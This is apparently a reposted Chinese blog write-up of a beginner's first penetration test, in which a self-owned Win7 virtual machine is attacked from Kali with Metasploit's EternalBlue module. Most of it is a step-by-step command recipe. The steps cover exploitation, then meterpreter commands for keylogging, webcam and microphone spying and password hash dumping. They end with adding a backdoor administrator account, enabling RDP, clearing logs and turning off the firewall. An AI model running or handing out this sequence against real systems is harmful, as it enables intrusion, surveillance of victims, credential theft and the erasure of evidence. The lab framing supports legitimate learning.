前言:这是一次难忘的渗透经历,刚开始是脑子一团雾水,无从下手。然后在看了几个大佬的帖子以后便就有了头绪,接下来我便讲讲我是怎么一步一步渗透的。
(1)**准备工作**:首先我这里是对自己虚拟机中的win7系统进行渗透,因此先打开win7,同时打开kali。由于第一次渗透,我这里打开win7系统手动查看了下ip地址,这里假如是192.168.188.66;然后在kali进入有root模式,输入命令ifconfig查看kali的机ip地址,这里假如是192.168.188.36.以上便是准备工作。
(2)**渗透ing**:首先检查靶机ip是否正确,先通过命令ping 192.168.188.66查看是否ping通,在输入命令arp-scan -i命令查看是否有靶机ip地址如果有便可以进行下一步。
之后利用MSF进行渗透,输入命令msfconsole;
然后这里我用的到是千年漏洞之永恒之蓝,输入命令search ms17_010
再利用该漏洞,输入命令use exploit/windows/smb/ms17_010_eternalblue进入到攻击模块。
这里输入命令show options或者options查看需要配置的参数。
所以需要设置攻击主机的ip和靶机ip,先输入命令set rhost 192.168.188.66;回车以后再输入set lhost 192.168.188.36。
之后使用攻击命令run或者exploit。
当出现绿色加号是就说明进攻成功,进入到meterpreter中。
这个时候就要熟悉一些meterpreter的命令,这里有一些命令可以参考。
meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
先输入命令sysinfo查看靶机硬件信息;
再输入screenshot截图靶机目前屏幕状况。
输入命令hashdump查看目标主机所有的用户名和密码(密码显示为hash值)
这里我们进入靶机cmd输入命令shell。
由于存在一些乱码我们需要命令chcp 65001。
这里需要用到一些cmd命令,以下可供参考:
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
————————————————
之后我们需要创建新用户以便后期提权,输入命令:
net user zhanghao password /add : 创建新用户。
创建新用户以后,我们还需要提权,输入命令;
net localgroup administrators zhanghao /add :将我们创建的新用户提升到管理员层次。
当然,我们提权之后还要查看我们是否提权成功,输入命令:
net user :查看我们创建的用户,若存在,则提权成功。
之后我们在kali重新打开root,输入命令:
rdesktop 192.168.188.66(这里的ip地址为靶机的IP地址):该指令用来远程操控靶机的桌面
如果对方远程操控并未启用,我们则需要在meterpreter模块中手动打开,输入命令:
run post/winidows/manage/enable_rdp
或者:
run getgui -e
之后我们便能渗透成功,但是我们还需销毁我们的痕迹,在meterpreter模块中输入:
clearve :清除日志。
当然有些命令还没用到,因为我攻击的是自己的win7系统,所以我自己把防火墙关了,这里可以在cmd输入命令:
netsh advfirewall set allprofiles state off:关闭防火墙
总结:
由于是小白,很多地方都是入门,所以便记录自己的第一次渗透经历,希望自己慢慢入门。
原文始发于微信公众号(衡阳信安):记第一次渗透的经历(利用msf渗透win7系统)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论